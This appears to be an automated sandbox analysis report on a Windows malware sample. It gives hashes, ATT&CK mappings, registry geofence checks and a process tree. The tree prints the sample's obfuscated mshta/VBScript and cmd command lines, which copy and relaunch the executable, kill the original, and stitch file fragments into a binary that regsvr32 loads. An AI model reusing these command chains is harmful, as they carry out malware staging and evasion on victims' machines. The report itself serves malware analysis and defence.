fc9920b7b170b63cd3167b21cc2bff2c746351c6010d5d96dfc2b2e4bab8fe5c

General

Target

d6233c6193802ea1bdb6513178dee0d4.exe
Size

1.6MB
MD5

d6233c6193802ea1bdb6513178dee0d4
SHA1

8ee6a6c09f4b381c9950c6dc07b5fbff394c82f2
SHA256

fc9920b7b170b63cd3167b21cc2bff2c746351c6010d5d96dfc2b2e4bab8fe5c
SHA512

9cfa2be3c9bec03a13f864531af4e1d701cc13559d86b5ff8916f0ac825ab7c2d779f7fca39d290c86bd9dabe51992a35392c508e7b4592168e38375838efa76
SSDEEP

49152:N8rQmdYldsM0ve6Mx+FhgYF158BLYRbK8R:artK/0W6q+FatBkR9R

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	d6233c6193802ea1bdb6513178dee0d4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	H2B6ZYOWt9N1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
3868	H2B6ZYOWt9N1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
3424	taskkill.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3424	taskkill.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1752 wrote to memory of 1044	1752	d6233c6193802ea1bdb6513178dee0d4.exe	89
PID 1752 wrote to memory of 1044	1752	d6233c6193802ea1bdb6513178dee0d4.exe	89
PID 1752 wrote to memory of 1044	1752	d6233c6193802ea1bdb6513178dee0d4.exe	89
PID 1044 wrote to memory of 4412	1044	mshta.exe	93
PID 1044 wrote to memory of 4412	1044	mshta.exe	93
PID 1044 wrote to memory of 4412	1044	mshta.exe	93
PID 4412 wrote to memory of 3868	4412	cmd.exe	95
PID 4412 wrote to memory of 3868	4412	cmd.exe	95
PID 4412 wrote to memory of 3868	4412	cmd.exe	95
PID 4412 wrote to memory of 3424	4412	cmd.exe	96
PID 4412 wrote to memory of 3424	4412	cmd.exe	96
PID 4412 wrote to memory of 3424	4412	cmd.exe	96
PID 3868 wrote to memory of 4740	3868	H2B6ZYOWt9N1.exe	98
PID 3868 wrote to memory of 4740	3868	H2B6ZYOWt9N1.exe	98
PID 3868 wrote to memory of 4740	3868	H2B6ZYOWt9N1.exe	98
PID 4740 wrote to memory of 696	4740	mshta.exe	99
PID 4740 wrote to memory of 696	4740	mshta.exe	99
PID 4740 wrote to memory of 696	4740	mshta.exe	99
PID 3868 wrote to memory of 4964	3868	H2B6ZYOWt9N1.exe	101
PID 3868 wrote to memory of 4964	3868	H2B6ZYOWt9N1.exe	101
PID 3868 wrote to memory of 4964	3868	H2B6ZYOWt9N1.exe	101

C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe
"C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1752
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vbscriPT: cloSe(cReATEobJECt ( "wSCrIPT.shell" ). RUn ( "CMd /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe"" ..\H2B6ZYOWt9N1.exe&& STArt ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T & iF """" =="""" for %k In (""C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe"" ) do taskkill -iM ""%~nXk"" -f " ,0 , tRue) )
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe" ..\H2B6ZYOWt9N1.exe&& STArt ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T & iF "" =="" for %k In ("C:\Users\Admin\AppData\Local\Temp\d6233c6193802ea1bdb6513178dee0d4.exe") do taskkill -iM "%~nXk" -f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4412
  - - C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe
      ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3868
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscriPT: cloSe(cReATEobJECt ( "wSCrIPT.shell" ). RUn ( "CMd /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe"" ..\H2B6ZYOWt9N1.exe&& STArt ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T & iF ""/Pxr__DUmdZ810p1T "" =="""" for %k In (""C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe"" ) do taskkill -iM ""%~nXk"" -f " ,0 , tRue) )
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4740
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe" ..\H2B6ZYOWt9N1.exe&& STArt ..\H2B6ZYOwT9N1.EXE /Pxr__DUmdZ810p1T & iF "/Pxr__DUmdZ810p1T " =="" for %k In ("C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe") do taskkill -iM "%~nXk" -f
        6⤵
        
        PID:696
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRipt:cloSe( crEAteOBjecT ("wsCrIpT.SHElL" ).RUN ("cMd.exE /c EchO C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;CWa> QMAYPJ4r.y9 & EchO | seT /P = ""MZ"" > F5Q7VM.QHS & cOpy /b /Y f5Q7Vm.QHS +3Z66_5OA.W + aSg6.VV + S_6i~t.h6+FFrXO.8u + TMSNJim6.J + i_tI18W.a + qMaypj4r.y9 ..\NOXj.P &DeL /q *& sTarT regsvr32 ..\NOXj.P /U /s ",0 , TrUE) )
        5⤵
        
        PID:4964
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill -iM "d6233c6193802ea1bdb6513178dee0d4.exe" -f
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\H2B6ZYOWt9N1.exe

Filesize
1.6MB

MD5
d6233c6193802ea1bdb6513178dee0d4

SHA1
8ee6a6c09f4b381c9950c6dc07b5fbff394c82f2

SHA256
fc9920b7b170b63cd3167b21cc2bff2c746351c6010d5d96dfc2b2e4bab8fe5c

SHA512
9cfa2be3c9bec03a13f864531af4e1d701cc13559d86b5ff8916f0ac825ab7c2d779f7fca39d290c86bd9dabe51992a35392c508e7b4592168e38375838efa76

Download Submit

Analysis

Sharing